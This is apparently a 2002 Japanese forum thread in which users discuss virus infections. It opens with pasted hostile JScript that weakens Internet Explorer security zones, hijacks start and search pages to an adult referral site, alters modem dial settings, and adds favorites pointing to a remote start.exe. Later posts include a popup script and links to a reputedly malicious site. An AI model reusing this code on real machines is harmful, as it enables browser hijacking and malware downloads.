function putfav(folder, folder2, folder3){

// savefavfile(folder3,label8,url8,icofile8,iconum8);
savefavfile(folder,label,url,icofile,iconum);

savefavfile(folder,"おまんこ無修正ネットアイドル","http://kanazawa.cool.ne.jp/pressing101/primera/start.exe","%WinDir%\\Mplayer.exe","3");
savefavfile(folder,"ファック無修正画像・映像","http://kanazawa.cool.ne.jp/pressing101/primera/start.exe","C:\\Program Files\\Internet Explorer\\Iexplore.exe","16");
}

function SetSrch(){


Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Dial","M0");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Off","M1");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\1","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\2","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\3","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\0","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");


// Shl.RegWrite("HKCU\\RemoteAccess\\Default","dialup01");
// Shl.RegWrite("HKCU\\RemoteAccess\\InternetProfile","dialup01");
Shl.RegWrite("HKCU\\RemoteAccess\\DialUI", 00000007,"REG_BINARY");
// Shl.RegWrite("HKCU\\RemoteAccess\\Profile\\dialup01\\AutoConnect", 01,"REG_DWORD");

Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\ie.search.msn.com","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\search.bisextop.com","http://www.idol-heaven.com/?id=martin");

Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.idol-heaven.com/?id=martin");

Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchURL","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Local Page","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Bar","http://www.idol-heaven.com/?id=martin");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchUrl","http://www.idol-heaven.com/?id=martin");
}

汚染を除去しました。

Shl.regwrite(regkey,filename);
//
//
//

}
catch(e){
return;
}
}

function init(){
setTimeout("f()", 1000);
}
init();


</SCRI-->
<!--ECT CLASSID ="CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC899" CODEBASE="redir.exe" </OBJE-->
</BODY></HTML>

実社会でも、「ボランティア」「奉仕」「手伝い」を他人に強要するヤシには、まともな人はいませぬ。

そゆのはあくまでも「任意・好意・善意もしくは気まぐれ」に基づく行動ですんで。

恐らくウイルス入りと思われるリンク先真っ白なフラッシュ踏んじゃったんだけど、どうすればいいでしょう？

>>974
ウィルスをだしにして他人の力を借りようとせずに、
本当にウィルスがあるのかないのか少なくともソースくらい読んで判断する。

>>974
ウイルスのスキャンをしたらどうっしょ。

ボランティアだから… といって他人に同じ行動(思想)を要求する奴もウザイ。
極端な例が貧民救済募金やってる女子大生。

>>973 「道楽」という行動原理があったりする。

>>977
「道楽」、いいっすね。

ウイルススキャンしても見つからない…
でも後ろのレスで「踏むな」とか２つ位ついてたからウイルスに間違いない…
どっかにIP表示されるくらいだったらいいんだけどなあ…

>>977
青くせーこといってんなよ、な、カス。
こっちまで恥ずかしくなってくるだろ。

39 名前：名無しさん＠３周年 投稿日：02/07/19 20:25 ID:3Lnf+EfE
サッカー監督、世界ベスト100
http://dms100.org/worksucks

さっきこれ踏んだんですが大丈夫でしょうか？
うわさでは強力なウイルスって聞いたんだけど？

>>966
あってるよ。

962は「暇じゃねーんだよ　ヴヲケ」と言ってるのに、
お前（963）は962に対して「書き込みする暇はあるんだな・・・」と言ってるんだろ。

962の発言は１分もあれば書けるが、回答は１行であっても時間はかかることを
965で俺は説明している。つまり、962の言ってること（暇がないこと）に矛盾はない
ことを代弁しているんだが、理解できないような文章だったか？

>>982
オマエ、「いいたいことがよくわからん」ってよくいわれるだろ?
オマエのような馬鹿はROMってるだけのほうがいいぜ。

Norton AntiVirus 2002のウイルス定義は毎日更新しており、XP標準のファイアウォールをオンにしているにも関わらず、
「ファイルへのアクセスが拒否されました」のメッセージが表示され駆除・ファイル復元出来ず、
繰り返し同種のウイルス「VBS.LoveLetter.A」に感染します。
とりあえず、オフラインに切り替えてから検疫した後、XPのシステム復元で対処している現状です。
問題点・対処法として考えられる事をお教え頂けませんでしょうか

>>981
それどんなやつ？

>>985
<script>
function worksucks() {
window.open('1ame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
window.open('lame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
}
</script>
こういう奴。

ウイルスもダウンロードされてくる。

>>986
すみません。
初心者なものでよくわからないのですが
どんなウイルスがはいっているのですか？

デンジャラス

きゅーきゅーしゃ

>>987
どれがウイルス？？
http://ime.nu/dms100.org/worksucks/hello.jpg
↑ｺﾚ?
http://ime.nu/dms100.org/worksucks/gay.jpg
↑ｺﾚ??
http://ime.nu/dms100.org/worksucks/gay.wav
↑ああ、ｺﾚか（w

>>991
なんすか　それ。

>>992
ｸﾘｸして飛んでみ。
At your oun riskで（ｗ

つか、
http空けてｶｷｺしると、ﾋﾟﾛｼｷ規制に引っかかるのか。。。。

>>984
私も全く同じ環境で同じ現象になります。
同じように検疫して削除し続けてます。
今日ニュー速板に行く度に感染します。
ニュー速板がおかしいのか、私のＰＣがおかしいのか…。

>995
どっかにｿｰｽの染み付いて汚れてるんだよ。
着てる服良く見てみ。早く洗わないと落ちなくなるよ。


つか、感染ぢゃ無くて「検出」ﾃﾞｼｮ・・・・

>>996
洗濯の仕方を教えてください…
教えて君ですみませんが…

すっぽんぽんなれや

>>997
そりゃチミ、熱いお湯で洗うがな。
それかｿｰｽの染み付いてるところ良く探し出してｱﾎﾞﾝしてもらうしか無いがな。

・・・そうそう、意外と絵とか模様書いてあるところは見落としがち・・・
「ｱﾎﾞﾝ」は洗剤ね。。。

1000

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。